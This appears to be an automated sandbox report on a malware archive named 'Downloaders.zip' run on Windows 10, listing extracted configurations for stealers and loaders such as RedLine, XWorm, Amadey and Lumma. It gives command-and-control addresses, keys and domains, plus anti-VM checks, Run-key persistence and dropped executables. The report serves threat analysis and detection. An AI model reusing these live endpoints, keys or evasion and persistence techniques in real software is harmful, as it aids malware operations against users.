Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
146s -
max time network
345s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
23-06-2024 11:08
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win10v2004-20240611-en
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Malware Config
Extracted
redline
LiveTraffic
4.185.27.237:13528
Extracted
redline
AMA
185.215.113.67:40960
Extracted
xworm
5.0
64.226.123.178:6098
1z0ENxCLSR3XRSre
-
install_file
USB.exe
Extracted
loaderbot
https://cv99160.tw1.ru/cmd.php
Extracted
redline
0011
185.91.127.219:33455
Extracted
xworm
3.1
200.9.155.204:7000
vzUmpEGHgtkl8VDB
-
install_file
USB.exe
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
risepro
77.91.77.66:58709
Extracted
redline
newbild
185.215.113.67:40960
Extracted
lumma
https://disappointcredisotw.shop/api
https://publicitycharetew.shop/api
https://computerexcudesp.shop/api
https://leafcalfconflcitw.shop/api
https://injurypiggyoewirog.shop/api
https://bargainnygroandjwk.shop/api
https://doughtdrillyksow.shop/api
https://facilitycoursedw.shop/api
Signatures
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/memory/6548-1369-0x0000000000810000-0x0000000000846000-memory.dmp family_xworm behavioral1/files/0x000700000002355d-1698.dat family_xworm behavioral1/memory/5908-1706-0x00000000006A0000-0x00000000006AE000-memory.dmp family_xworm -
Phorphiex payload 1 IoCs
resource yara_rule behavioral1/files/0x000e0000000235fb-20577.dat family_phorphiex -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/4820-1285-0x0000000000400000-0x0000000000450000-memory.dmp family_redline behavioral1/files/0x00080000000234d3-1331.dat family_redline behavioral1/memory/3708-1338-0x0000000000420000-0x0000000000470000-memory.dmp family_redline behavioral1/files/0x000700000002355c-1689.dat family_redline behavioral1/memory/2052-1705-0x0000000000460000-0x00000000004B0000-memory.dmp family_redline behavioral1/files/0x0008000000016977-19907.dat family_redline behavioral1/memory/7600-19912-0x0000000000BC0000-0x0000000000C10000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ limba.exe -
LoaderBot executable 2 IoCs
resource yara_rule behavioral1/files/0x00080000000234f8-1528.dat loaderbot behavioral1/memory/6272-1537-0x00000000003F0000-0x00000000007EE000-memory.dmp loaderbot -
pid Process 6112 powershell.exe 8000 powershell.exe 7568 powershell.exe 5076 powershell.exe 5220 powershell.exe 7596 powershell.exe 4892 powershell.exe 6928 powershell.exe 4324 powershell.exe 1612 powershell.exe 6044 powershell.exe 6740 powershell.exe 6724 powershell.exe 440 powershell.exe 6540 powershell.exe 8072 powershell.exe 6348 powershell.exe 5980 powershell.exe 2944 powershell.exe 6340 powershell.exe 7652 powershell.exe 5412 powershell.exe 6568 powershell.exe 4328 powershell.exe 5312 powershell.exe 4488 powershell.exe 4928 powershell.exe 872 powershell.exe 4532 powershell.exe 8108 powershell.exe 2216 powershell.exe 4900 powershell.exe 6856 powershell.exe 988 powershell.exe 8000 powershell.exe 2128 powershell.exe 2140 powershell.exe 6820 powershell.exe 2128 powershell.exe 5992 powershell.exe 7248 powershell.exe 1612 powershell.exe 6544 powershell.exe 8096 powershell.exe 3560 powershell.exe 2764 powershell.exe 4324 powershell.exe 872 powershell.exe 1124 powershell.exe 5552 powershell.exe 5928 powershell.exe 4344 powershell.exe 6804 powershell.exe 4388 powershell.exe 7736 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion limba.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion limba.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation 4363463463464363463463463.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation svchost.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation ChatLife.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation ama.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation BuildTotale.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation serieta.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation 0x3fg.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation pic1.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation rolex.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation cleaner.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation 7.exe Key value queried \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\International\Geo\Nation New Text Document mod.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url yondex.exe -
Executes dropped EXE 57 IoCs
pid Process 936 New Text Document mod.exe 6316 4363463463464363463463463.exe 6484 uYtF.exe 6840 serieta.exe 6952 0x3fg.exe 3524 natura.exe 3216 nautr.exe 3900 Notepad.exe 1124 Notepad.exe 1544 Hkbsse.exe 5324 Notepad.exe 5280 Notepad.exe 2924 setup.exe 2444 setup.exe 5888 wfbrmcwrltkl.exe 2628 BuildTotale.exe 4640 supportoxmr.exe 3936 DRIVEapplet.exe 3428 etc test.exe 6296 Notepad.exe 3940 gold.exe 6880 Notepad.exe 3628 taskweaker.exe 5256 %E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe 3708 ama.exe 5240 setup222.exe 5476 look.exe 6240 FirstZ.exe 6548 look.exe 2364 etuamactyjne.exe 5780 pseaptzkxyms.exe 6052 pic1.exe 3152 SetupWizard.exe 7108 SetupWizard.exe 6840 svchost.exe 1084 winsvc.exe 1196 epitheliogeneticTFr.exe 5236 rolex.exe 6232 Hkbsse.exe 3188 Jufrxnb.exe 6272 yondex.exe 5632 Jufrxnb.exe 1824 Jufrxnb.exe 4904 Jufrxnb.exe 208 pic15.exe 4984 limba.exe 5316 ChatLife.exe 1408 1.exe 3080 gui.exe 2208 cleaner.exe 2052 ccleanerfile.exe 5908 XClient.exe 3220 6.exe 6760 esfowblknspo.exe 1708 wsfekkbdzjcc.exe 6308 7.exe 4468 axplong.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine 7.exe Key opened \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Software\Wine axplong.exe -
Loads dropped DLL 26 IoCs
pid Process 1124 Notepad.exe 1124 Notepad.exe 1124 Notepad.exe 1124 Notepad.exe 1124 Notepad.exe 1124 Notepad.exe 1124 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 5280 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 6880 Notepad.exe 3936 DRIVEapplet.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0009000000023353-1584.dat themida behavioral1/memory/4984-1591-0x0000000000400000-0x0000000000BFD000-memory.dmp themida behavioral1/memory/4984-7613-0x0000000000400000-0x0000000000BFD000-memory.dmp themida -
resource yara_rule behavioral1/files/0x0008000000023551-2133.dat upx behavioral1/memory/2764-2167-0x0000000000C50000-0x0000000000E10000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\yondex.exe" yondex.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Notepad.exe" Notepad.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Desktop\\a\\Notepad.exe" Notepad.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA limba.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\N: Jufrxnb.exe File opened (read-only) \??\T: Jufrxnb.exe File opened (read-only) \??\X: Jufrxnb.exe File opened (read-only) \??\E: Jufrxnb.exe File opened (read-only) \??\L: Jufrxnb.exe File opened (read-only) \??\P: Jufrxnb.exe File opened (read-only) \??\W: Jufrxnb.exe File opened (read-only) \??\Y: Jufrxnb.exe File opened (read-only) \??\Z: Jufrxnb.exe File opened (read-only) \??\H: Jufrxnb.exe File opened (read-only) \??\I: Jufrxnb.exe File opened (read-only) \??\M: Jufrxnb.exe File opened (read-only) \??\R: Jufrxnb.exe File opened (read-only) \??\S: Jufrxnb.exe File opened (read-only) \??\V: Jufrxnb.exe File opened (read-only) \??\B: Jufrxnb.exe File opened (read-only) \??\G: Jufrxnb.exe File opened (read-only) \??\J: Jufrxnb.exe File opened (read-only) \??\K: Jufrxnb.exe File opened (read-only) \??\O: Jufrxnb.exe File opened (read-only) \??\Q: Jufrxnb.exe File opened (read-only) \??\U: Jufrxnb.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow ioc 181 raw.githubusercontent.com 182 raw.githubusercontent.com 257 pastebin.com 396 raw.githubusercontent.com 454 pastebin.com 251 raw.githubusercontent.com 258 pastebin.com 289 pastebin.com 395 raw.githubusercontent.com 453 pastebin.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 340 ipinfo.io 341 ipinfo.io -
Power Settings 1 TTPs 55 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5556 powercfg.exe 3328 powercfg.exe 2476 powercfg.exe 6748 powercfg.exe 7380 powercfg.exe 5156 powercfg.exe 6456 powercfg.exe 4608 powercfg.exe 2208 powercfg.exe 2140 powercfg.exe 6868 powercfg.exe 6672 powercfg.exe 4376 powercfg.exe 5852 powercfg.exe 1216 powercfg.exe 1980 powercfg.exe 1940 powercfg.exe 6588 powercfg.exe 6512 powercfg.exe 7980 powercfg.exe 6912 powercfg.exe 5184 powercfg.exe 4560 powercfg.exe 6676 powercfg.exe 1720 powercfg.exe 7160 powercfg.exe 2208 powercfg.exe 5600 powercfg.exe 5408 powercfg.exe 5672 powercfg.exe 3080 powercfg.exe 6580 powercfg.exe 8060 powercfg.exe 4416 powercfg.exe 2116 powercfg.exe 5604 powercfg.exe 4472 powercfg.exe 5696 powercfg.exe 4548 powercfg.exe 5464 powercfg.exe 6472 powercfg.exe 5748 powercfg.exe 5680 powercfg.exe 6784 powercfg.exe 6748 powercfg.exe 6292 powercfg.exe 8080 powercfg.exe 5840 powercfg.exe 1300 powercfg.exe 1936 powercfg.exe 5856 powercfg.exe 2232 powercfg.exe 8108 powercfg.exe 8160 powercfg.exe 7020 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/memory/2764-2167-0x0000000000C50000-0x0000000000E10000-memory.dmp autoit_exe -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\winsvc.exe setup.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\MRT.exe wsfekkbdzjcc.exe File opened for modification C:\Windows\system32\MRT.exe FirstZ.exe File opened for modification C:\Windows\system32\MRT.exe esfowblknspo.exe File opened for modification C:\Windows\System32\.coC99.tmp setup.exe File opened for modification C:\Windows\system32\.coC99.tmp setup.exe File opened for modification C:\Windows\system32\MRT.exe etc test.exe File opened for modification C:\Windows\system32\MRT.exe supportoxmr.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 6308 7.exe 4468 axplong.exe -
Suspicious use of SetThreadContext 12 IoCs
description pid Process procid_target PID 5888 set thread context of 5976 5888 wfbrmcwrltkl.exe 190 PID 3940 set thread context of 4820 3940 gold.exe 203 PID 5476 set thread context of 6548 5476 look.exe 220 PID 2364 set thread context of 5612 2364 etuamactyjne.exe 223 PID 2364 set thread context of 3432 2364 etuamactyjne.exe 226 PID 5780 set thread context of 5864 5780 pseaptzkxyms.exe 230 PID 3936 set thread context of 6904 3936 DRIVEapplet.exe 404 PID 3628 set thread context of 2444 3628 taskweaker.exe 274 PID 1708 set thread context of 5880 1708 wsfekkbdzjcc.exe 318 PID 1708 set thread context of 2292 1708 wsfekkbdzjcc.exe 319 PID 208 set thread context of 4588 208 pic15.exe 323 PID 6760 set thread context of 2996 6760 esfowblknspo.exe 343 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe svchost.exe File opened for modification C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe svchost.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\Hkbsse.job 0x3fg.exe File created C:\Windows\Tasks\axplong.job 7.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4692 sc.exe 6904 sc.exe 8172 sc.exe 3924 sc.exe 2164 sc.exe 180 sc.exe 5640 sc.exe 2764 sc.exe 6772 sc.exe 6432 sc.exe 6576 sc.exe 7148 sc.exe 6016 sc.exe 3900 sc.exe 5552 sc.exe 7476 sc.exe 6036 sc.exe 4784 sc.exe 3164 sc.exe 648 sc.exe 396 sc.exe 5368 sc.exe 812 sc.exe 2664 sc.exe 5752 sc.exe 5824 sc.exe 6824 sc.exe 6456 sc.exe 4604 sc.exe 8052 sc.exe 7436 sc.exe 5840 sc.exe 5616 sc.exe 3732 sc.exe 864 sc.exe 7464 sc.exe 5696 sc.exe 6364 sc.exe 7180 sc.exe 4400 sc.exe 7548 sc.exe 5916 sc.exe 4284 sc.exe 3308 sc.exe 7048 sc.exe 6108 sc.exe 5160 sc.exe 2328 sc.exe 6544 sc.exe 7288 sc.exe 4440 sc.exe 4556 sc.exe 5840 sc.exe 1000 sc.exe 4472 sc.exe 5328 sc.exe 4604 sc.exe 7672 sc.exe 5780 sc.exe 3636 sc.exe 5540 sc.exe 964 sc.exe 6600 sc.exe 5684 sc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000500000001dab7-1122.dat pyinstaller behavioral1/files/0x000200000001e3fd-20164.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 12 IoCs
pid pid_target Process procid_target 4784 6840 WerFault.exe 240 3308 5632 WerFault.exe 249 4996 3188 WerFault.exe 245 2640 4904 WerFault.exe 253 864 1408 WerFault.exe 262 3400 6216 WerFault.exe 371 4048 6300 WerFault.exe 369 4612 6300 WerFault.exe 369 2328 4596 WerFault.exe 465 4376 4580 WerFault.exe 557 8104 1824 WerFault.exe 252 4640 1996 WerFault.exe 751 -
NSIS installer 2 IoCs
resource yara_rule behavioral1/files/0x001b000000023608-21454.dat nsis_installer_1 behavioral1/files/0x001b000000023608-21454.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString Jufrxnb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 Jufrxnb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Jufrxnb.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3244 timeout.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 3528 tasklist.exe 4964 tasklist.exe 7776 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Kills process with taskkill 9 IoCs
pid Process 6924 taskkill.exe 5692 taskkill.exe 6420 taskkill.exe 1164 taskkill.exe 1424 taskkill.exe 2116 taskkill.exe 6780 taskkill.exe 2656 taskkill.exe 5136 taskkill.exe -
Modifies Control Panel 26 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance\Current rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\High Contrast Scheme rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\Flags = "126" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Wait = "C:\\Windows\\cursors\\aero_busy.ani" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\No = "C:\\Windows\\cursors\\aero_unavail.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\IBeam rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Help = "C:\\Windows\\cursors\\aero_helpsel.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\NWPen = "C:\\Windows\\cursors\\aero_pen.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Crosshair rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNS = "C:\\Windows\\cursors\\aero_ns.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeWE = "C:\\Windows\\cursors\\aero_ew.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Accessibility\HighContrast\Previous High Contrast Scheme MUI Value rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Arrow = "C:\\Windows\\cursors\\aero_arrow.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\cursors\\aero_working.ani" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNESW = "C:\\Windows\\cursors\\aero_nesw.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\ = "Windows Default" rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Scheme Source = "2" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Appearance\NewCurrent rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeNWSE = "C:\\Windows\\cursors\\aero_nwse.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\UpArrow = "C:\\Windows\\cursors\\aero_up.cur" rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000 rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\Hand = "C:\\Windows\\cursors\\aero_link.cur" rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000\Control Panel\Cursors\SizeAll = "C:\\Windows\\cursors\\aero_move.cur" rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-174 = "Microsoft PowerPoint Presentation" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-120 = "Microsoft Word 97 - 2003 Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9939 = "ADTS Audio" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\msinfo32.exe,-10001 = "System Information File" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" SearchIndexer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000383d8bd95dc5da01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.WTV SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-101 = "Microsoft Excel Worksheet" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\system32\zipfldr.dll,-10195 = "Compressed (zipped) Folder" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation" 